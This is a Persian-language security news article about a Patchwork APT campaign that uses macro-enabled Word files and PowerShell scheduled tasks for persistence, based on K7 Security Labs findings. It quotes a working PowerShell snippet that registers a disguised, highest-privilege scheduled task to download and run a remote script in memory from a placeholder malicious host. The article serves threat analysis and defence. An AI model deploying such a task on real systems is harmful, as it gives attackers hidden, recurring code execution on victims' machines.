از نیمهٔ ۲۰۲۵، محققان امنیت سایبری شاهد بازگشتی از کمپینهای گروه تهدید پیشرفته Patchwork (APT) بودهاند که بخشهایی از دولت و بخش مخابرات را در آسیا و اروپای شرقی هدف قرار میدهند.
در ابتدا این کمپینها از ایمیلهای spear-phishing حاوی پیوستهای مخرب Office بهره میبردند، اما موج اخیر فعالیتها به یک زنجیرهٔ آلودهسازی چندمرحلهای تکامل یافته است که از تاکتیکهای پیشرفتهٔ حفظ دسترسی (persistence) و بازیابی payload بهره میگیرد.
نفوذ اولیه معمولاً وقتی آغاز میشود که یک کاربر بیملاحظه ماکروها را در یک سند Word مسلحشده فعال میکند و در نتیجه یک اسکریپت PowerShell جاسازیشده مخفیانه به یک سرور command-and-control متصل میشود.
از آن نقطه، اپراتورهای Patchwork یک foothold برقرار میکنند، credentialها را جمعآوری میکنند و دسترسی بلندمدت درون شبکههای آلوده را حفظ میکنند.
در هفتههای اخیر، تحلیلگران K7 Security Labs مشاهده کردهاند که مؤلفهٔ PowerShell مسئول persistence با تولید URLهای پویا و نامگذاری تصادفی برای scheduled taskها بهروزرسانی شده است تا از تشخیص توسط راهکارهای مانیتورینگ endpoint فرار کند.
تحلیلگران تغییر از URLهای فرمان ایستا به یک مکانیزم failover با چند URL را شناسایی کردند، تا اگر یک منبع دانلود مسدود شود، تلاشهای بعدی همچنان موفقیتآمیز باشند.
این بهبود نشاندهندهٔ تمرکز گروه بر ناکار کردن کنترلهای تشخیص مبتنی بر شبکه است، با توزیع میزبانی payloadها در میان چندین وبسرور بهخطرافتاده.
.webp)
اثرات این عملیات از سرقت credential تا استقرار ابزارهای دسترسی از راه دور سفارشی متغیر بوده است که اجازه حرکت جانبی و استخراج دادهها را فراهم میکند.
قربانیان گزارش دادهاند که نوسانات CPU و درخواستهای خروجی HTTP غیرعادی که در فواصل زمانی منظم اتفاق میافتند، دیده شده است که نشاندهندهٔ اجرای scheduled taskهاست.
در چند مورد، اپراتورها payload نهاییای مستقر کردهاند که از باینریهای مشروع ویندوز برای لود کردن DLLهای مخرب در حافظه بهره میبرد و تحلیلهای جرمشناسی را پیچیده میسازد.
Payloadهای مشاهدهشده از ابزارهای dumper رمزعبور تا فریمورکهای C2 سفارشی که قادر به اجرای دستورات دلخواه و بارگذاری ماژولهای اضافی طبق نیاز هستند، متفاوت است.
مکانیزم آلودهسازی از طریق Scheduled Taskها
مرور دقیق مکانیزم آلودهسازی Patchwork نشان میدهد چگونه این گروه از ابزارهای بومی ویندوز برای هماهنگی اجرای payload استفاده میکند.
با اجرای downloader اولیه PowerShell، بدافزار یک نام تسک یکتایی تولید میکند که اغلب شبیه سرویسهای نگهداری استاندارد ویندوز بهنظر میرسد.
قطعهکد PowerShell زیر که از یک لاگ incident response بازیابی شده است، هستهٔ این تاکتیک persistence را نشان میدهد:
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30) -RepetitionDuration ([TimeSpan]::MaxValue)
$action = New-ScheduledTaskAction -Execute "PowerShell.exe" -Argument "-NoProfile -WindowStyle Hidden -Command `"IEX ((New-Object Net.WebClient).DownloadString('http://malicious.server/update.ps1'))`""
Register-ScheduledTask -TaskName "WindowsUpdateAgent-$([guid]::NewGuid().ToString())" -Trigger $trigger -Action $action -RunLevel Highest
اسکریپت PowerShell (منبع – K7 Security Labs)
.webp)
این scheduled task بهصورت خاموش و در فواصل زمانی مکرر اجرا میشود و payload نهایی را دانلود و اجرا میکند بدون آنکه فایلهایی روی دیسک نوشته شوند.
استفاده از Invoke-Expression (IEX) همراه با New-Object Net.WebClient به بدافزار اجازه میدهد اسکریپتها را مستقیماً به حافظه استریم کند و از تشخیصهای مبتنی بر فایل عبور کند.
پس از بارگذاری payload ثانویه، اپراتورها دسترسی تعاملی کامل از طریق یک backdoor سفارشی بهدست میآورند که امکان جمعآوری credential و حرکت جانبی را فراهم میسازد.
با سوءاستفاده از زمانبندی تسکها و APIهای شبکهٔ مشروع ویندوز، Patchwork APT بهطرز موفقیتآمیزی در فعالیتهای عادی سیستم استتار میکند، و این موضوع چالشهای قابلتوجهی برای مدافعان ایجاد میکند که در تلاشند بین رفتارهای مخرب و عملیات نگهداری روتین تمایز قائل شوند.
یک نظر